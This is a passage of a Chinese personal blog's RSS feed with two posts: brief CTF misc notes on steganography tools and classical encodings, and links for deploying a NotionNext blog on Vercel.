<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>𝓪𝔀𝓸𝓿𝓴𝓳'𝓑𝓵𝓸𝓰</title>
        <link>https://510517.xyz/</link>
        <description>hhh~</description>
        <lastBuildDate>Thu, 12 Mar 2026 06:30:27 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <language>zh-CN</language>
        <copyright>All rights reserved 2026, awovkj</copyright>
        <item>
            <title><![CDATA[misc总结]]></title>
            <link>https://510517.xyz/article/1.13</link>
            <guid>https://510517.xyz/article/1.13</guid>
            <pubDate>Fri, 02 Jul 2021 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-143233a6c40b81b08b32c7f0fe5ba247"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-1a8233a6c40b807eb073efc070ba9a3e" data-id="1a8233a6c40b807eb073efc070ba9a3e"><span><div id="1a8233a6c40b807eb073efc070ba9a3e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b807eb073efc070ba9a3e" title="没有提示一般步骤"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">没有提示一般步骤</span></span></h2><div class="notion-text notion-block-1a8233a6c40b80b6a1facf8ea90a4a3b">（可以装个kali子系统，方便一点）kali file命令分析，foremost、binwalk等命令分离，使用010editor 查看</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-1a8233a6c40b801a99d6fcf8ba8e9030" data-id="1a8233a6c40b801a99d6fcf8ba8e9030"><span><div id="1a8233a6c40b801a99d6fcf8ba8e9030" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b801a99d6fcf8ba8e9030" title="音频处理"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>音频处理</b></span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b80c99b20c48b4c56eb1e" data-id="1a8233a6c40b80c99b20c48b4c56eb1e"><span><div id="1a8233a6c40b80c99b20c48b4c56eb1e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b80c99b20c48b4c56eb1e" title="1.MP3stego"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>1.MP3stego</b></span></span></h3><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b80479e5edcd01f18e613" data-id="1a8233a6c40b80479e5edcd01f18e613"><span><div id="1a8233a6c40b80479e5edcd01f18e613" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b80479e5edcd01f18e613" title="2.Audacity"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>2.Audacity</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b805aaae6f2a356b21a5e">看形状</div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b80a7b443f20e2baa5eed" data-id="1a8233a6c40b80a7b443f20e2baa5eed"><span><div id="1a8233a6c40b80a7b443f20e2baa5eed" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b80a7b443f20e2baa5eed" title="3.deepsound"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>3.deepsound</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b80ba849cc55b79ccd1fb">分离文件</div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b8076a6eae9dfa0a12fa1" data-id="1a8233a6c40b8076a6eae9dfa0a12fa1"><span><div id="1a8233a6c40b8076a6eae9dfa0a12fa1" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b8076a6eae9dfa0a12fa1" title="4.silenteye(静默之眼)wav"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>4.silenteye(静默之眼)wav</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b80fb890bcd8463ad096a">质量要试一下</div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-1a8233a6c40b8042a740e192dcdb0bab" data-id="1a8233a6c40b8042a740e192dcdb0bab"><span><div id="1a8233a6c40b8042a740e192dcdb0bab" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b8042a740e192dcdb0bab" title="misc之jpg解密"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">misc之jpg解密</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b8038b7c7c31ac440367b" data-id="1a8233a6c40b8038b7c7c31ac440367b"><span><div id="1a8233a6c40b8038b7c7c31ac440367b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b8038b7c7c31ac440367b" title="1.Steghide"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">1.Steghide</span></span></h3><div class="notion-text notion-block-1a8233a6c40b8010a198c04cef01a23f">提取</div><div class="notion-text notion-block-1a8233a6c40b8043944df0a6795824ab">steghide extract -sf test.jpg -p 123456</div><div class="notion-text notion-block-1a8233a6c40b804cad08dbfc26b051bf">查看图片中嵌入的文件信息</div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b8087af6fdc80c5c7c608" data-id="1a8233a6c40b8087af6fdc80c5c7c608"><span><div id="1a8233a6c40b8087af6fdc80c5c7c608" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b8087af6fdc80c5c7c608" title="2.Jphs工具"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">2.Jphs工具</span></span></h3><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b80dfb20beb166c90dee5" data-id="1a8233a6c40b80dfb20beb166c90dee5"><span><div id="1a8233a6c40b80dfb20beb166c90dee5" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b80dfb20beb166c90dee5" title="3.要爆破"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">3.要爆破</span></span></h3><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-1a8233a6c40b806092bfc08960243449" data-id="1a8233a6c40b806092bfc08960243449"><span><div id="1a8233a6c40b806092bfc08960243449" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b806092bfc08960243449" title="编码"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">编码</span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b803bad02c9421372fb9c" data-id="1a8233a6c40b803bad02c9421372fb9c"><span><div id="1a8233a6c40b803bad02c9421372fb9c" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b803bad02c9421372fb9c" title="XXencode：字母有大小写，++"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>XXencode：字母有大小写，++</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b8096bf3fe1745a3feb60">eg：KGJB1J2NvEaJVR3xHNZFdMKsV6G2VTE++</div><div class="notion-text notion-block-1a8233a6c40b80588170d8ced89133a8">在线解密：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://www.hiencode.com/xxencode.html">http://www.hiencode.com/xxencode.html</a></div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b80068018d9e62de454e0" data-id="1a8233a6c40b80068018d9e62de454e0"><span><div id="1a8233a6c40b80068018d9e62de454e0" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b80068018d9e62de454e0" title="Ook编码："><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>Ook编码：</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b807d8c31e8cfd93c3016">1.ook密码中有大量ook，加上一些符号</div><div class="notion-text notion-block-1a8233a6c40b8097a12fd1cba655e346">2.short ook大量 . ？ ！</div><div class="notion-text notion-block-1a8233a6c40b80e8aa1fd52cb5928781">brainfuck:大量[ - &gt; +</div><div class="notion-text notion-block-1a8233a6c40b80bc81d6c39ca424a338">在线解密：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.splitbrain.org/services/ook">https://www.splitbrain.org/services/ook</a></div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-1a8233a6c40b808087b6f534dc1b218b" data-id="1a8233a6c40b808087b6f534dc1b218b"><span><div id="1a8233a6c40b808087b6f534dc1b218b" class="notion-header-anchor"></div><a class="notion-hash-link" href="#1a8233a6c40b808087b6f534dc1b218b" title="猪圈密码"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title"><b>猪圈密码</b></span></span></h3><div class="notion-text notion-block-1a8233a6c40b80f497f1d1ddf3833273">在线解密：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="http://www.hiencode.com/pigpen.html">http://www.hiencode.com/pigpen.html</a></div></main></div>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[建站]]></title>
            <link>https://510517.xyz/article/sanye</link>
            <guid>https://510517.xyz/article/sanye</guid>
            <pubDate>Fri, 02 Jul 2021 00:00:00 GMT</pubDate>
            <description><![CDATA[水]]></description>
            <content:encoded><![CDATA[<div id="notion-article" class="mx-auto overflow-hidden "><main class="notion light-mode notion-page notion-block-143233a6c40b813f8720ca0a17dd357f"><div class="notion-viewport"></div><div class="notion-collection-page-properties"></div><div class="notion-blank notion-block-26f233a6c40b80699ce7ff431329ffa6"> </div><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-176233a6c40b809cb229e9fb7efd97b8" data-id="176233a6c40b809cb229e9fb7efd97b8"><span><div id="176233a6c40b809cb229e9fb7efd97b8" class="notion-header-anchor"></div><a class="notion-hash-link" href="#176233a6c40b809cb229e9fb7efd97b8" title="建站要求：梯子,vercel、notion、github账号"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">建站要求：梯子,vercel、notion、github账号</span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-176233a6c40b809482e1e019bdd05fad" data-id="176233a6c40b809482e1e019bdd05fad"><span><div id="176233a6c40b809482e1e019bdd05fad" class="notion-header-anchor"></div><a class="notion-hash-link" href="#176233a6c40b809482e1e019bdd05fad" title="视频教程：【NotionNext-Vercel部署】 https://www.bilibili.com/video/BV1fM4y1L7Qi/?share_source=copy_web&amp;vd_source=e008185615b8f6dd46fa341976fa7e24"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">视频教程：【NotionNext-Vercel部署】 <a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.bilibili.com/video/BV1fM4y1L7Qi/?share_source=copy_web&amp;vd_source=e008185615b8f6dd46fa341976fa7e24">https://www.bilibili.com/video/BV1fM4y1L7Qi/?share_source=copy_web&amp;vd_source=e008185615b8f6dd46fa341976fa7e24</a></span></span></h2><h2 class="notion-h notion-h1 notion-h-indent-0 notion-block-176233a6c40b80c49183fa32be0de456" data-id="176233a6c40b80c49183fa32be0de456"><span><div id="176233a6c40b80c49183fa32be0de456" class="notion-header-anchor"></div><a class="notion-hash-link" href="#176233a6c40b80c49183fa32be0de456" title="文字教程：https://docs.tangly1024.com/article/vercel-deploy-notion-next"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">文字教程：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://docs.tangly1024.com/article/vercel-deploy-notion-next">https://docs.tangly1024.com/article/vercel-deploy-notion-next</a></span></span></h2><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-176233a6c40b8078bdaef0b4b4078aac" data-id="176233a6c40b8078bdaef0b4b4078aac"><span><div id="176233a6c40b8078bdaef0b4b4078aac" class="notion-header-anchor"></div><a class="notion-hash-link" href="#176233a6c40b8078bdaef0b4b4078aac" title="github项目地址："><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">github项目地址：<a target="_blank" rel="noopener noreferrer" href="https://github.com/tangly1024/NotionNext" class="notion-external notion-external-mention"><div class="notion-external-image"><svg viewBox="0 0 260 260"><g><path d="M128.00106,0 C57.3172926,0 0,57.3066942 0,128.00106 C0,184.555281 36.6761997,232.535542 87.534937,249.460899 C93.9320223,250.645779 96.280588,246.684165 96.280588,243.303333 C96.280588,240.251045 96.1618878,230.167899 96.106777,219.472176 C60.4967585,227.215235 52.9826207,204.369712 52.9826207,204.369712 C47.1599584,189.574598 38.770408,185.640538 38.770408,185.640538 C27.1568785,177.696113 39.6458206,177.859325 39.6458206,177.859325 C52.4993419,178.762293 59.267365,191.04987 59.267365,191.04987 C70.6837675,210.618423 89.2115753,204.961093 96.5158685,201.690482 C97.6647155,193.417512 100.981959,187.77078 104.642583,184.574357 C76.211799,181.33766 46.324819,170.362144 46.324819,121.315702 C46.324819,107.340889 51.3250588,95.9223682 59.5132437,86.9583937 C58.1842268,83.7344152 53.8029229,70.715562 60.7532354,53.0843636 C60.7532354,53.0843636 71.5019501,49.6441813 95.9626412,66.2049595 C106.172967,63.368876 117.123047,61.9465949 128.00106,61.8978432 C138.879073,61.9465949 149.837632,63.368876 160.067033,66.2049595 C184.49805,49.6441813 195.231926,53.0843636 195.231926,53.0843636 C202.199197,70.715562 197.815773,83.7344152 196.486756,86.9583937 C204.694018,95.9223682 209.660343,107.340889 209.660343,121.315702 C209.660343,170.478725 179.716133,181.303747 151.213281,184.472614 C155.80443,188.444828 159.895342,196.234518 159.895342,208.176593 C159.895342,225.303317 159.746968,239.087361 159.746968,243.303333 C159.746968,246.709601 162.05102,250.70089 168.53925,249.443941 C219.370432,232.499507 256,184.536204 256,128.00106 C256,57.3066942 198.691187,0 128.00106,0 Z M47.9405593,182.340212 C47.6586465,182.976105 46.6581745,183.166873 45.7467277,182.730227 C44.8183235,182.312656 44.2968914,181.445722 44.5978808,180.80771 C44.8734344,180.152739 45.876026,179.97045 46.8023103,180.409216 C47.7328342,180.826786 48.2627451,181.702199 47.9405593,182.340212 Z M54.2367892,187.958254 C53.6263318,188.524199 52.4329723,188.261363 51.6232682,187.366874 C50.7860088,186.474504 50.6291553,185.281144 51.2480912,184.70672 C51.8776254,184.140775 53.0349512,184.405731 53.8743302,185.298101 C54.7115892,186.201069 54.8748019,187.38595 54.2367892,187.958254 Z M58.5562413,195.146347 C57.7719732,195.691096 56.4895886,195.180261 55.6968417,194.042013 C54.9125733,192.903764 54.9125733,191.538713 55.713799,190.991845 C56.5086651,190.444977 57.7719732,190.936735 58.5753181,192.066505 C59.3574669,193.22383 59.3574669,194.58888 58.5562413,195.146347 Z M65.8613592,203.471174 C65.1597571,204.244846 63.6654083,204.03712 62.5716717,202.981538 C61.4524999,201.94927 61.1409122,200.484596 61.8446341,199.710926 C62.5547146,198.935137 64.0575422,199.15346 65.1597571,200.200564 C66.2704506,201.230712 66.6095936,202.705984 65.8613592,203.471174 Z M75.3025151,206.281542 C74.9930474,207.284134 73.553809,207.739857 72.1039724,207.313809 C70.6562556,206.875043 69.7087748,205.700761 70.0012857,204.687571 C70.302275,203.678621 71.7478721,203.20382 73.2083069,203.659543 C74.6539041,204.09619 75.6035048,205.261994 75.3025151,206.281542 Z M86.046947,207.473627 C86.0829806,208.529209 84.8535871,209.404622 83.3316829,209.4237 C81.8013,209.457614 80.563428,208.603398 80.5464708,207.564772 C80.5464708,206.498591 81.7483088,205.631657 83.2786917,205.606221 C84.8005962,205.576546 86.046947,206.424403 86.046947,207.473627 Z M96.6021471,207.069023 C96.7844366,208.099171 95.7267341,209.156872 94.215428,209.438785 C92.7295577,209.710099 91.3539086,209.074206 91.1652603,208.052538 C90.9808515,206.996955 92.0576306,205.939253 93.5413813,205.66582 C95.054807,205.402984 96.4092596,206.021919 96.6021471,207.069023 Z" fill="#161614"></path></g></svg></div><div class="notion-external-description"><div class="notion-external-title">NotionNext</div><div class="notion-external-subtitle"><div class="notion-preview-card-domain-warp"><div class="notion-preview-card-logo"><svg viewBox="0 0 260 260"><g><path d="M128.00106,0 C57.3172926,0 0,57.3066942 0,128.00106 C0,184.555281 36.6761997,232.535542 87.534937,249.460899 C93.9320223,250.645779 96.280588,246.684165 96.280588,243.303333 C96.280588,240.251045 96.1618878,230.167899 96.106777,219.472176 C60.4967585,227.215235 52.9826207,204.369712 52.9826207,204.369712 C47.1599584,189.574598 38.770408,185.640538 38.770408,185.640538 C27.1568785,177.696113 39.6458206,177.859325 39.6458206,177.859325 C52.4993419,178.762293 59.267365,191.04987 59.267365,191.04987 C70.6837675,210.618423 89.2115753,204.961093 96.5158685,201.690482 C97.6647155,193.417512 100.981959,187.77078 104.642583,184.574357 C76.211799,181.33766 46.324819,170.362144 46.324819,121.315702 C46.324819,107.340889 51.3250588,95.9223682 59.5132437,86.9583937 C58.1842268,83.7344152 53.8029229,70.715562 60.7532354,53.0843636 C60.7532354,53.0843636 71.5019501,49.6441813 95.9626412,66.2049595 C106.172967,63.368876 117.123047,61.9465949 128.00106,61.8978432 C138.879073,61.9465949 149.837632,63.368876 160.067033,66.2049595 C184.49805,49.6441813 195.231926,53.0843636 195.231926,53.0843636 C202.199197,70.715562 197.815773,83.7344152 196.486756,86.9583937 C204.694018,95.9223682 209.660343,107.340889 209.660343,121.315702 C209.660343,170.478725 179.716133,181.303747 151.213281,184.472614 C155.80443,188.444828 159.895342,196.234518 159.895342,208.176593 C159.895342,225.303317 159.746968,239.087361 159.746968,243.303333 C159.746968,246.709601 162.05102,250.70089 168.53925,249.443941 C219.370432,232.499507 256,184.536204 256,128.00106 C256,57.3066942 198.691187,0 128.00106,0 Z M47.9405593,182.340212 C47.6586465,182.976105 46.6581745,183.166873 45.7467277,182.730227 C44.8183235,182.312656 44.2968914,181.445722 44.5978808,180.80771 C44.8734344,180.152739 45.876026,179.97045 46.8023103,180.409216 C47.7328342,180.826786 48.2627451,181.702199 47.9405593,182.340212 Z M54.2367892,187.958254 C53.6263318,188.524199 52.4329723,188.261363 51.6232682,187.366874 C50.7860088,186.474504 50.6291553,185.281144 51.2480912,184.70672 C51.8776254,184.140775 53.0349512,184.405731 53.8743302,185.298101 C54.7115892,186.201069 54.8748019,187.38595 54.2367892,187.958254 Z M58.5562413,195.146347 C57.7719732,195.691096 56.4895886,195.180261 55.6968417,194.042013 C54.9125733,192.903764 54.9125733,191.538713 55.713799,190.991845 C56.5086651,190.444977 57.7719732,190.936735 58.5753181,192.066505 C59.3574669,193.22383 59.3574669,194.58888 58.5562413,195.146347 Z 